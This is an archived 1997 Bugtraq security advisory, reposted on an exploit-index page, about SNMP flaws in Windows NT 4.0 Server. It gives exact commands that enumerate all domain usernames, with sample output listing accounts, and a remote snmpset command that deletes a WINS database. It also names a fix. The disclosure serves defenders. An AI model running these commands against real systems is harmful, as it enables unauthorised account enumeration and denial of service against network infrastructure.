SNMP holes in Windoze NT 4.0
Description: | One bug described allows you to dump all domain usernames with smnpwalk. Another allows you to delete WINS database records remotely. Micro$oft is pathetic. Nobody should by their products. Get Linux, or OpenBSD, or Solaris. |
Author: | "Rouland, Christopher J" <CRouland@EXAMNYC.lehman.com> |
Compromise: | Determine usernames, potenet DoS |
Vulnerable Systems: | Those running WindoZe 4.0 Server with snmp |
Date: | 8 October 1997 |
Date: Wed, 8 Oct 1997 19:08:37 -0500
From: Aleph One <aleph1@DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: SNMP Insecurity
---------- Forwarded message ----------
Date: Tue, 7 Oct 1997 15:36:13 -0400
From: "Rouland, Christopher J" <CRouland@EXAMNYC.lehman.com>
To: "'ntsecurity@iss.net'" <ntsecurity@iss.net>
Subject: [NTSEC] SNMP Insecurity
All:
I have found two significant "features" in the SNMP agent
implementations under NT 4.0 Server, and I am sure there are more if I
feel like really digging. The first issue I sent in earlier this year
to Microsoft and received no response other than "expected behavior" and
the second I just found and puts any large NT shop at a serious denial
of service (DOS) risk.
1. This first exploit demonstrates the ability via SNMP to dump a list
of all usernames in an NT domain (assuming the target box is a DC) or on
an NT Server.
Here is the simplest NT example I could find to use this:
C:\NTRESKIT>snmputil walk <hostname> public .1.3.6.1.4.1.77.1.2.25
<hostname> should be a domain controller or server
Sample output at end of message.
2.The second exploit demonstrates the ability via SNMP to delete all of
the records in a WINS database remotely, bypassing all NT security. If
you understand large scale WINS architecture, you can understand the
implications of this. Knowledge of SNMP community strings would allow
an attacker to effectively shut down any large NT infrastructure with
"N" commands (N=number of WINS servers). This is permitted due to the
extensive "cmd" set implemented in the WINS extension agent,
specifically:
cmdDeleteWins OBJECT-TYPE
SYNTAX IpAddress
ACCESS read-write
STATUS mandatory
DESCRIPTION
"This variable when set will cause all
information
pertaining to a WINS (data records, context
information to be deleted from the local WINS.
Use this only when owner-address mapping table
is
getting to near capacity. NOTE: deletion of all
information pertaining to the managed WINS is
not
permitted"
::= { cmd 3 }
Since the SNMP toolset implemented under NT will not do
snmp-set-requests, my sample exploit was done using the CMU SNMP
development kit under Unix. The command "rnjdev02:~/cmu$ snmpset -v 1
192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2"
successfully entirely deleted my WINS database.
3. It appears that there are several other pieces of the LMMIB2
definition that allow for things such as remote session deletion or
disconnect, etc, but I have not yet looked into them.
4. The simplest fix is to disable SNMP, or to remove the extension
agents through the SNMP configuration in the registry.
Regards,
Chris
--
Chris Rouland
Lehman Brothers, Inc.
crouland@lehman.com
-----
C:\NTRESKIT>snmputil walk 192.178.16.2 public
.1.3.6.1.4.1.77.1.2.25
Output:
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.71.117.101.115.116
Value = OCTET STRING - Guest
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.49
Value = OCTET STRING - test1
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.50
Value = OCTET STRING - test2
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.51
Value = OCTET STRING - test3
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.52
Value = OCTET STRING - test4
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.53
Value = OCTET STRING - test5
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.54
Value = OCTET STRING - test6
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.55
Value = OCTET STRING - test7
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.56
Value = OCTET STRING - test8
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.5.116.101.115.116.57
Value = OCTET STRING - test9
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.6.116.101.115.116.49.48
Value = OCTET STRING - test10
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.8.116.101.115.116.117.115.101.114
Value = OCTET STRING - testuser
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.13.65.100.109.105.110.105.115.116.114.97
.116.111.114
Value = OCTET STRING - Administrator
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.13.73.85.83.82.95.82.78.74.68.69.86.48.4
9
Value = OCTET STRING - IUSR_NT4SRVDEV1
Variable =
.iso.org.dod.internet.private.enterprises.lanmanager.lanmgr-2.server.svU
serTable.svUserEntry.svUserName.19.83.81.76.69.120.101.99.117.116.105.11
8.101.67.109.100.69.120.101.99
Value = OCTET STRING - SQLExecutiveCmdExec
End of MIB subtree.
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: